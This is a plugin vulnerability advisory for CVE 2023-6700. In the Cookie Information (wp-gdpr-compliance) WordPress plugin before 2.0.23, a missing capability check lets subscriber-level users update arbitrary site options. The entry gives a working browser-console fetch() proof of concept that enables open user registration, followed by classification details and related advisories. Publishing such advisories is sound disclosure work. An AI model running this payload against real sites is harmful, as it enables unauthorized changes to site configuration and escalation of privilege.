Cookie Information < 2.0.23 – Subscriber+ Arbitrary Options Update | CVE 2023-6700 | Plugin Vulnerabilities

Description

The plugin is vulnerable to arbitrary option updates due to a missing capability check on its AJAX request handler, allowing any authenticated users, such as subscriber to update arbitrary site options

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as subscriber user to set the users_can_register option to true.

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=wpgdprc_update_integration&data={"name":"users_can_register","value":true,"type":"yolo"}&security=' + wpgdprcAdmin['ajaxNonce'],
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

wp-gdpr-compliance

Fixed in 2.0.23

References

CVE

URL

https://www.wordfence.com/threat-intel/vulnerabilities/id/42a4ef37-c842-4925-b06a-3e6423337567

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Lucio Sá

Verified

Yes

WPVDB ID

0c207e0a-f52d-4a59-a7b1-94e4a19b45f6

Timeline

Publicly Published

2024-01-29 (about 2 years ago)

Added

2024-01-31 (about 2 years ago)

Last Updated

2024-01-31 (about 2 years ago)

Other

Published

Title

Published

2025-12-03

Title

Post SMTP – Complete SMTP Solution with Logs, Alerts, Backup SMTP & Mobile App < 3.6.2 - Missing Authorization to Authenticated (Subscriber+) OAuth Token Update

Published

2024-01-08

Title

Word Replacer Pro <= 1.0 - Missing Authorization

Published

2024-04-05

Title

Wholesale For WooCommerce < 2.3.1 - Unauthenticated Arbitrary Post Deletion

Published

2024-04-05

Title

Advanced Local Pickup for WooCommerce < 1.6.3 - Missing Authorization

Published

2024-12-11

Title

Custom Skins Contact Form 7 <= 1.0 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Post Update and Skin Creation